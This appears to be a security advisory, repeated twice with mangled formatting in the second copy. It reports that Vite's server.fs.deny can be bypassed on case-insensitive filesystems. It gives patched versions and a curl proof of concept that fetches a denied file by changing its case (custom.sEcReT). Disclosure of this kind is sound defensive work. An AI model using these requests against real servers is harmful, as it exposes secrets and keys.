Summary
Vite dev server option server.fs.deny
can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.
This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.
Patches
Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17
Details
Since picomatch
defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.
See picomatch
usage, where nocase
is defaulted to false
: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632
By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny
fails to block access to sensitive files.
PoC
Setup
- Created vanilla Vite project using
npm create vite@latest
on a Standard Azure hosted Windows 10 instance.
- Created dummy secret files, e.g.
custom.secret
and production.pem
- Populated
vite.config.js
with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }
Reproduction
curl -s http://20.12.242.81:5173/@fs//
- Descriptive error page reveals absolute filesystem path to project root
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
- Discoverable configuration file reveals locations of secrets
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
- Secrets are directly accessible using case-augmented version of filename
Proof
Impact
Who
- Users with exposed dev servers on environments with case-insensitive filesystems
What
- Files protected by
server.fs.deny
are both discoverable, and accessible
Summary
Vite dev server option
server.fs.deny
can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.
Patches
Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17
Details
Since
picomatch
defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.See
picomatch
usage, wherenocase
is defaulted tofalse
: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632By requesting raw filesystem paths using augmented casing, the matcher derived from
config.server.fs.deny
fails to block access to sensitive files.PoC
Setup
npm create vite@latest
on a Standard Azure hosted Windows 10 instance.npm run dev -- --host 0.0.0.0
custom.secret
andproduction.pem
vite.config.js
withReproduction
curl -s http://20.12.242.81:5173/@fs//
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
Proof
Impact
Who
What
server.fs.deny
are both discoverable, and accessible